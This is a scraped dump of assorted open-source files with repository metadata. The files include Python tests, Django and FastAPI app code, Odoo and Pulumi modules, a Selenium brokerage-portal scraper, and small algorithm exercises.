("feedback", "0001_initial"),
]
operations = [
migrations.RunPython(migrate_search_feedback, migrations.RunPython.noop)
]
|
[
"noreply@github.com"
] |
uktrade.noreply@github.com
|
965bc7e325875ed234ebf3d269bc9a012f110885
|
c987e888b0ccd9051e26335b3641cbd80aa14e2a
|
/tests/circular/template/test_context.py
|
5db0e9c17d97674ab5b8c8d6f013bfc57113b782
|
[
"MIT"
] |
permissive
|
jonathanverner/circular
|
fa47eef5f2914da8540d0c0c50f3fe5d2d87d598
|
e29bb9cc846566943febd8ba85104d796943819c
|
refs/heads/master
| 2020-12-04T11:49:48.587539
| 2017-08-17T11:12:58
| 2017-08-17T11:12:58
| 66,577,154
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
import asyncio
import pytest
from src.circular.template.context import Context
def test_extension():
base = Context()
base.a = 10
base.c = 30
child = Context(base=base)
# Child should have access to parent
assert child.a == 10
# The _get method should work for accessing parent
assert child._get('a') == 10
# Child should not be allowed to modify parent
child.a = 20
assert child.a == 20
assert base.a == 10
# Attributes should propagate recursively
second_child = Context(base=child)
assert second_child.c == 30
assert second_child.a == 20
def test_future(event_loop):
asyncio.set_event_loop(event_loop)
ctx = Context()
fut = asyncio.async(asyncio.sleep(0.1, result=3))
ctx.test = fut
assert hasattr(ctx, 'test') is False
event_loop.run_until_complete(fut)
assert ctx.test == 3
|
[
"jonathan.verner@matfyz.cz"
] |
jonathan.verner@matfyz.cz
|
d9a7f7e7bc166bb6f1556dbcbf9c4e875c736b66
|
e4dd3e5d76073b2ba2c8a06a713582a7b8fd6983
|
/eveauth/models/role.py
|
2bf7e073cbbce0bddcd8bc43d7af18ff587e8483
|
[] |
no_license
|
extraquoo/avrse-auth
|
792f1f217c682dfdace1467d81f2225976078750
|
5c94ac5e61954e37cc52dda0e884977b01eeff2a
|
refs/heads/master
| 2020-05-20T00:24:58.466016
| 2018-10-17T22:40:53
| 2018-10-17T22:40:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
from django.db import models
from .character import Character
class Role(models.Model):
character = models.ForeignKey(Character, related_name="roles")
name = models.CharField(max_length=128, db_index=True)
def __str__(self):
return "%s on %s" % (self.name, self.character.name)
|
[
"skylinerspeeder@gmail.com"
] |
skylinerspeeder@gmail.com
|
bdc3df8f4e675387177e4c1e95dbfe2ce8ad0c84
|
a46b064486b703b5424a5e59fb6d567a0c08d480
|
/scripts/pushmsg
|
fed86e723478dbd82c088dc2756750e5c891a332
|
[
"MIT"
] |
permissive
|
nick-youngblut/pushmsg
|
1dd3ca23dbfa8277f92b7261c5eabeb6ea5bd3c6
|
389cd22476077198593bd4b4af3900fd1644da65
|
refs/heads/master
| 2022-07-23T14:52:46.886835
| 2020-05-23T19:21:22
| 2020-05-23T19:21:22
| 71,820,460
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 530
|
#!/usr/bin/env python
import sys
import argparse
import pushmsg
parser = argparse.ArgumentParser(
description='Send messages with Pushbullet',
epilog='For all options, see the line magic help'
)
parser.add_argument('msg', help='Message to send via Pushbullet')
parser.add_argument('--version', action='version', version='0.0.1')
if __name__ == '__main__':
args = parser.parse_known_args()
sys.argv[-1] = '"' + sys.argv[-1] + '"'
line = ' '.join(sys.argv[1:])
p = pushmsg.PushMsg()
p.pushmsg(line)
|
[
"nicholas.youngblut@tuebingen.mpg.de"
] |
nicholas.youngblut@tuebingen.mpg.de
|
|
64811b756a4e41173c5e5898912f0448a3f966dc
|
1a3e6ff7b86fa34e4ef88f3e0fe7e1472f7f6821
|
/vortex-methods/vel_integration.py
|
7700104a2b37c85b4b1ae011fe0449ca7db1b4e2
|
[] |
no_license
|
rbonvall/tesis
|
0c901746c1b93aa300c928104455e23ef93bcf87
|
a93a07965387fc5a944a39eb734cfc34d0c09404
|
refs/heads/master
| 2020-05-30T22:09:38.621467
| 2011-07-04T14:47:33
| 2011-07-04T14:47:33
| 213,789
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
#!/usr/bin/env python
from numpy import zeros_like
import functools
import vm
def euler(x, y, circ, dt, squared_blob_size):
u, v = vm.eval_velocity(x, y, circ=circ,
squared_blob_size=squared_blob_size)
return u, v
def runge_kutta(x, y, circ, dt, squared_blob_size):
u, v = zeros_like(x), zeros_like(y)
eval_velocity = functools.partial(vm.eval_velocity, circ=circ,
squared_blob_size=squared_blob_size)
kx, ky = eval_velocity(x, y) # k1
u += kx/6
v += ky/6
dx, dy = kx * (dt/2), ky * (dt/2)
kx, ky = eval_velocity(x + dx, y + dy) # k2
u += kx/3
v += ky/3
dx, dy = kx * (dt/2), ky * (dt/2)
kx, ky = eval_velocity(x + dx, y + dy) # k3
u += kx/3
v += ky/3
dx, dy = kx * dt, ky * dt
kx, ky = eval_velocity(x + dx, y + dy) # k4
u += kx/6
v += ky/6
return u, v
|
[
"rbonvall@gmail.com"
] |
rbonvall@gmail.com
|
821fd4f3941c3016fc767da9f978015d7ee9d854
|
416e303e3c64fbc3571f204c3b3b281b4ce642be
|
/examples/1.3/special_batch_compo/list_dataset.py
|
4d37a894ac6da61939269cd7c3d88ef00cef73b7
|
[
"Apache-2.0"
] |
permissive
|
fastestimator-util/fastestimator-misc
|
6cba0f25ee5e9ace30bef392adc8081777db510f
|
c46e901d84745f35b7b49bdbb7b7121d39759b3f
|
refs/heads/master
| 2023-08-09T13:58:27.846807
| 2023-07-27T01:27:32
| 2023-07-27T01:27:32
| 208,510,459
| 8
| 9
|
Apache-2.0
| 2023-07-27T01:27:41
| 2019-09-14T22:14:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,455
|
py
|
import pdb
from os import pipe
from torch.utils.data import Dataset
import fastestimator as fe
from fastestimator.architecture.tensorflow import LeNet
from fastestimator.dataset import BatchDataset
from fastestimator.dataset.data import mnist
from fastestimator.op.numpyop.univariate import ExpandDims, Minmax
from fastestimator.op.tensorop import TensorOp
from fastestimator.op.tensorop.loss import CrossEntropy
from fastestimator.op.tensorop.model import ModelOp, UpdateOp
class NegativeImageSimulatedTube(Dataset):
def __init__(self, ds):
self.ds = ds
def __getitem__(self, idx):
# create your 5 simulated image here, for simplicity, I will just copy the same image 5 times
image = self.ds[idx]["x"]
label = self.ds[idx]["y"]
return [{"x": image, "y": label} for _ in range(5)]
def __len__(self):
return len(self.ds)
def get_estimator():
ds, _ = mnist.load_data()
ds = NegativeImageSimulatedTube(ds)
pipeline = fe.Pipeline(train_data=ds, ops=[ExpandDims(inputs="x", outputs="x"), Minmax(inputs="x", outputs="x")])
model = fe.build(model_fn=LeNet, optimizer_fn="adam")
network = fe.Network(ops=[
ModelOp(model=model, inputs="x", outputs="y_pred"),
CrossEntropy(inputs=("y_pred", "y"), outputs="ce"),
UpdateOp(model=model, loss_name="ce")
])
estimator = fe.Estimator(pipeline=pipeline, network=network, epochs=2)
return estimator
|
[
"shawnmengdong@gmail.com"
] |
shawnmengdong@gmail.com
|
698bdeeb48ab9e92ecab93669f2d8d302bc0673a
|
abd7504f6562babf79fb4e86af7529b2cb40fb54
|
/tests/pyre.pkg/descriptors/dataDescriptor_set.py
|
7d7a5fd65cabe1f2c11b54febcf9ac6f7623788f
|
[] |
no_license
|
aivazis/p2
|
266c1728554b3f7a89e72f09ba2d9e5ff8d4447d
|
fd9a82d7dafa815dd68f679eb2b4b1a6287d02ea
|
refs/heads/main
| 2022-01-08T12:45:16.646028
| 2022-01-01T17:31:10
| 2022-01-01T17:31:10
| 225,452,981
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,247
|
py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# michael a.g. aïvázis <michael.aivazis@para-sim.com>
# (c) 1998-2022 all rights reserved
def test():
"""
Verify that the {__set__} method behaves as expected
"""
# get the descriptor class
from p2.descriptors.DataDescriptor import DataDescriptor as descriptor
# make a subclass
class trait(descriptor):
# that implements the protocol
def __get__(self, instance, cls):
# if this instance access
if instance is not None:
# retrieve the value from the {instance} inventory
return instance.inventory[self]
# otherwise, just return myself
return self
def __set__(self, instance, value):
# store {value} in the {instance} inventory
instance.inventory[self] = value
# all done
return self
# make a client
class Client:
raw = descriptor()
cooked = trait()
# metamethods
def __init__(self, **kwds):
# chain up
super().__init__(**kwds)
# initialize my inventory
self.inventory = {}
# all done
return
# instantiate
client = Client()
# first set the value of the base descriptor
try:
# this should raise an error
client.raw = 5
# so we shouldn't get here
assert False, "unreachable"
# trap the expected failure
except AttributeError as error:
# unpack the arguments
desc, instance = error.args
# verify that the instance is correct
assert instance is client
# access the functional descriptor before we ever set its value
try:
# the lookup is expected to fail
client.cooked
# so trap it
except KeyError as error:
# get the key that cause the lookup to fail
key, *_ = error.args
# verify it's the trait we accessed
assert key == Client.cooked
# set the value
client.cooked = True
# and check
assert client.cooked is True
# all done
return
# main
if __name__ == "__main__":
# run the test
test()
# end of file
|
[
"michael.aivazis@para-sim.com"
] |
michael.aivazis@para-sim.com
|
57e3464578970c186bbf72034ecffedcb4f1e8e3
|
2b6ca87b32c18a1e48ffb64675abc97fda3bc6f6
|
/src/onecontainer_api/routers/ai.py
|
c017be766571aee37b503baa3b212c8fb8a5d995
|
[
"BSD-3-Clause"
] |
permissive
|
gabrielbriones/oneContainer-API
|
7882b86ff1c0b4fb4461de09deb96633e7fbed51
|
ea81ed31b921711d38d352ee3a9e56bd4231bf43
|
refs/heads/main
| 2023-01-22T17:45:20.345662
| 2020-12-04T20:50:18
| 2020-12-04T20:50:18
| 318,630,019
| 0
| 0
| null | 2020-12-04T20:39:23
| 2020-12-04T20:39:23
| null |
UTF-8
|
Python
| false
| false
| 2,008
|
py
|
"""AI vertical entrypoint."""
from typing import List
from fastapi import APIRouter, Depends, File, UploadFile
import databases
from onecontainer_api import models, schemas, errors
from onecontainer_api.routers import services, drivers
import re
router = APIRouter()
@router.get("/ai/{service_id}/usage",
description="Get functions available for this service")
async def usage(service_id: str, sync: bool = False, ttl: int = 3600, db: databases.Database = Depends(models.get_db)):
service = await services.get_service(service_id, db)
if service.driver:
driver = await drivers.get_driver(service.driver)
return drivers.service_stack(driver, service, "get", "/usage", sync=sync, ttl=ttl)
raise errors.ServiceException(service.id, errors.NO_DRV_ERROR, "Service has no driver assigned")
@router.post("/ai/{service_id}/serve",
description="Load a model")
async def serve(service_id: str, model_meta: schemas.AIModelMeta, sync: bool = False, ttl: int = 3600, db: databases.Database = Depends(models.get_db)):
service = await services.get_service(service_id, db)
if service.driver:
driver = await drivers.get_driver(service.driver)
return drivers.service_stack(driver, service, "post", "/serve", data=model_meta.dict(), sync=sync, ttl=ttl)
raise errors.ServiceException(service.id, errors.NO_DRV_ERROR, "Service has no driver assigned")
@router.post("/ai/{service_id}/predict",
description="Execute an inference over an image")
async def predict(service_id: str, image_file: UploadFile = File(...), sync: bool = False, ttl: int = 3600, db: databases.Database = Depends(models.get_db)):
service = await services.get_service(service_id, db)
if service.driver:
driver = await drivers.get_driver(service.driver)
return drivers.service_stack(driver, service, "post", "/predict", data=image_file, sync=sync, ttl=ttl)
raise errors.ServiceException(service.id, errors.NO_DRV_ERROR, "Service has no driver assigned")
|
[
"gabriel.briones.sayeg@intel.com"
] |
gabriel.briones.sayeg@intel.com
|
487a6cba227881b051690e18f580cda7c3918873
|
e77cbe31ed7eb052571a41cd7d68d110d3ca20ad
|
/procurement_request/wizard/procurement_request_wizard.py
|
b6a19b8f2dcd61f67039a71e4d929959d90cfdde
|
[] |
no_license
|
lopin123/falinwa_branch
|
237fa59d934e0672d1c55b95e619a7f4c97eb3b4
|
051821ec3d2691338953a38a5aed64a60c35113e
|
refs/heads/master
| 2021-01-02T22:34:36.390758
| 2015-04-08T07:58:27
| 2015-04-08T07:58:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,316
|
py
|
# -*- coding: utf-8 -*-
from openerp.osv import fields, orm
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
from dateutil.relativedelta import relativedelta
from datetime import date
class procurement_request_wizard(orm.TransientModel):
_name = "procurement.request.wizard"
_description = "Procurement Request Wizard"
_columns = {
'product_id' : fields.many2one('product.product','Product',required=True),
'product_qty' : fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
'date_order': fields.date('Order Date', required=True),
'partner_id' : fields.many2one('res.partner', 'Supplier', required=True),
'date_planned' : fields.date('Expected Date'),
}
def _get_supplier(self, cr, uid, context=None):
if context is None:
context = {}
product_obj = self.pool.get('product.product')
supplier_obj = self.pool.get('res.partner')
res = supplier_obj.search(cr, uid, [('name', '=', 'SUPPLIER TO BE DEFINED'),
('supplier', '=', True)],
limit=1)
if context.get('active_id',False):
product_id = product_obj.browse(cr, uid, context.get('active_id',False))
if product_id.seller_ids:
res = [product_id.seller_ids[0].name.id]
return res and res[0] or False
_defaults = {
'date_order': fields.date.context_today,
'product_qty': lambda *args: 1.0,
'partner_id': _get_supplier,
}
def make_procurement_request(self, cr, uid, ids, context=None):
if context is None:
context = {}
data_wizard = self.browse(cr, uid, ids, context)[0]
purchase_order_obj = self.pool.get('purchase.order')
warehouse_obj = self.pool.get('stock.warehouse')
warehouse_id = warehouse_obj.search(cr, uid, [], context=context)[0]
wh = warehouse_obj.browse(cr ,uid ,warehouse_id , context=context)
purchase_order_obj.create(cr, uid, {
'req_product_id' : data_wizard.product_id.id,
'req_product_description' : data_wizard.product_id.name,
'req_uom_id' : data_wizard.product_id.uom_po_id.id,
'req_product_qty' : data_wizard.product_qty,
'location_id' : wh.wh_input_stock_loc_id.id,
'date_order' : data_wizard.date_order+ ' 00:00:00',
'partner_id' : data_wizard.partner_id.id,
'pricelist_id' : data_wizard.partner_id.property_product_pricelist_purchase.id,
'origin' : 'Direct from Product',
'minimum_planned_date' : data_wizard.date_planned,
},context=context)
return {
'type': 'ir.actions.act_window',
'name': 'Procurement Request',
'res_model': 'purchase.order',
'view_mode': 'tree',
'view_type': 'form',
'view_id': self.pool.get('ir.model.data').get_object_reference(cr, uid, 'procurement_request', 'fal_procurement_request_tree')[1],
'target': 'current',
'nodestroy': False,
'domain': '[("state","=","procurement_request")]',
}
#end of procurement_request_wizard()
|
[
"hans.yonathan@falinwa.com"
] |
hans.yonathan@falinwa.com
|
6cf1014ce60dbc8ae7505b3d9a75e4852b1a3698
|
8f1c3c76bf8514818b733ba29fe575d8a5243add
|
/eduerp_attendance/models/__init__.py
|
e27612b75f471c9162dd01c4529d7609eddb4edc
|
[
"Apache-2.0"
] |
permissive
|
westlyou/eduerp
|
27f1c7dcd0d2badf50cb6c69f5e761d7f0c6a898
|
968d79b5adc729bc81192604f1fc223517d38ccf
|
refs/heads/master
| 2021-06-04T05:11:13.858246
| 2016-09-12T07:21:17
| 2016-09-12T07:21:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
###############################################################################
from . import attendance_line
from . import attendance_register
from . import attendance_sheet
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"huysamdua@yahoo.com"
] |
huysamdua@yahoo.com
|
f9a52da70f400cadaddf780a7db144d291e1f193
|
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
|
/sdk/python/pulumi_azure_native/iotcentral/_inputs.py
|
037588016bbe804fa5963d69b4ae4f963d2bd3ef
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
MisinformedDNA/pulumi-azure-native
|
9cbd75306e9c8f92abc25be3f73c113cb93865e9
|
de974fd984f7e98649951dbe80b4fc0603d03356
|
refs/heads/master
| 2023-03-24T22:02:03.842935
| 2021-03-08T21:16:19
| 2021-03-08T21:16:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,024
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from ._enums import *
__all__ = [
'AppSkuInfoArgs',
]
@pulumi.input_type
class AppSkuInfoArgs:
def __init__(__self__, *,
name: pulumi.Input[Union[str, 'AppSku']]):
"""
Information about the SKU of the IoT Central application.
:param pulumi.Input[Union[str, 'AppSku']] name: The name of the SKU.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> pulumi.Input[Union[str, 'AppSku']]:
"""
The name of the SKU.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[Union[str, 'AppSku']]):
pulumi.set(self, "name", value)
|
[
"noreply@github.com"
] |
MisinformedDNA.noreply@github.com
|
894b65e24be5bbe3bb8ae5de43cf5a4301381c52
|
7cc141beb2948f64e1b187862108b883f09bf71c
|
/NotasCorretagens/chromedriver.py
|
66a8495368cc630687cbb1b08c9fedc457e3a6c0
|
[
"MIT"
] |
permissive
|
felipemaion/scraping_xpi
|
5829a83d67da398cccd4d91c096108fe6f3cf0a7
|
522a5955c05a7da1e70055f7668f0e5e3593cf72
|
refs/heads/master
| 2020-05-02T15:39:59.604808
| 2019-04-01T07:58:05
| 2019-04-01T07:58:05
| 178,048,850
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,578
|
py
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait, Select
from selenium.webdriver.support.expected_conditions import presence_of_element_located
class Scraper:
def __init__(self, *args, **kwargs):
self.chrome_path = r'/Users/maion/bin/chromedriver'
self.driver = webdriver.Chrome(executable_path=self.chrome_path)
self.driver.get("https://portal.xpi.com.br")
# return super().__init__(*args, **kwargs)
def minha_conta(self):
return self.driver.find_element_by_xpath("""//*[@id="yield-portal-header"]/header/section[2]/div/nav/ul/li[1]/span""").click()
def notas_corretagens(self):
return self.driver.find_element_by_xpath("""//*[@id="yield-portal-header"]/header/section[2]/div/nav/ul/li[1]/ul/li[2]/dl/dd[4]/a""").click()
def combo_box(self):
return Select(self.driver.find_element_by_xpath("""//*[@id="Data"]"""))
def define_tipo_relatorio(self):
return self.driver.find_element_by_xpath("""//*[@id="rdbXP"]""").click()
def gera_relatorio(self):
return self.driver.find_element_by_xpath("""//*[@id="stNotasCor"]/article/div/div/span[4]/button""").click()
def baixa_relatorio(self):
return self.driver.find_element_by_xpath("""//*[@id="icon"]""")
def patrimonio(self):
return self.driver.find_element_by_xpath("""/html/body/div[2]/section/div[3]/div[1]/div/div[4]/p[1]/span/span""").text
scraper = Scraper()
|
[
"felipe.maion@gmail.com"
] |
felipe.maion@gmail.com
|
e3a292441f1962e474bd358f71425ba3ac374a99
|
8f48d12b88048e424ebb0d72ca6dfab5cf12ae0f
|
/1500_1999/1910.py
|
05f3524ffd5384049fc271225340944a7db37961
|
[] |
no_license
|
renjieliu/leetcode
|
e1caf13c18a8107ed9252588b339fb76bcb1b246
|
4668b64fcb9320b6c316d8608fc61911ce43b6c7
|
refs/heads/master
| 2023-03-18T18:16:06.187741
| 2023-03-14T20:31:59
| 2023-03-14T20:31:59
| 128,823,819
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
class Solution:
def removeOccurrences(self, s: str, part: str) -> str:
output = ""
for c in s:
output += c
while len(output) >= len(part) and output[-len(part):] == part:
output = output[:-len(part)]
return output
# previous approach
# class Solution:
# def removeOccurrences(self, s: str, part: str) -> str:
# while part in s:
# s = s.replace(part, '')
# return s
|
[
"anlrj@qq.com"
] |
anlrj@qq.com
|
54902efb2e961b3c0e80bfdb0b26efaa72d60f79
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_313/ch54_2020_03_31_00_22_57_884915.py
|
d4a200b530199c65a717529b916d673f8331f920
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
def calcula_fibonacci(n):
fibonacci = [0]*100
fibonacci[1] = 1
fibonacci[0] = 1
n=2
while(n<100):
fibonacci[n] = fibonacci[n-1]+fibonacci[n-2]
n = n + 1
|
[
"you@example.com"
] |
you@example.com
|
81f2858581aeddee8d0342e21d1ce3c9479530e8
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02262/s141204203.py
|
4d4e0e7ed1cedd407f0385ff3cc2d2558a5c8cde
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 660
|
py
|
cnt = 0
m = 0
g = []
def insertion_sort(a, n, g):
# cnt+=1 のときにローカルスコープの外を見にいくようにするため
global cnt
for i in range(g, n):
v = a[i]
k = i - g
while k >= 0 and a[k] > v:
a[k+g] = a[k]
k -= g
cnt += 1
a[k+g] = v
def shell_sort(a, n):
global m, g
h = 1
while h <= n:
g.append(h)
h = h * 3 + 1
g.reverse()
m = len(g)
for i in range(m):
insertion_sort(a, n, g[i])
n = int(input())
a = [int(input()) for i in range(n)]
shell_sort(a, n)
print(m)
print(*g)
print(cnt)
for i in a:
print(i)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
537ea782435fb47f81c6431c0278bb50ccfe0c70
|
d8afb2e678d9da745a114e8feffee930218716b4
|
/backend/adv_test_3_23538/settings.py
|
ae68df3785b6f69fbc2d8f0ca426a63043c5a8f4
|
[] |
no_license
|
crowdbotics-apps/adv-test-3-23538
|
fd03929a6a4d8e984c2daad895d0c20fd80b4df5
|
e2af927fa78de374384d9d6b59a74207f4209bba
|
refs/heads/master
| 2023-02-12T15:18:53.318287
| 2020-12-24T19:38:53
| 2020-12-24T19:38:53
| 324,224,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,035
|
py
|
"""
Django settings for adv_test_3_23538 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'adv_test_3_23538.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'adv_test_3_23538.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
4016835924c889c2ef390dd8f82ba30088442636
|
0cd799684098c374ec6d0806410f2077814b2e9e
|
/advisor/migrations/0002_booking.py
|
7e9a8232b8d404a10fdf566e1ecff43de219c083
|
[
"MIT"
] |
permissive
|
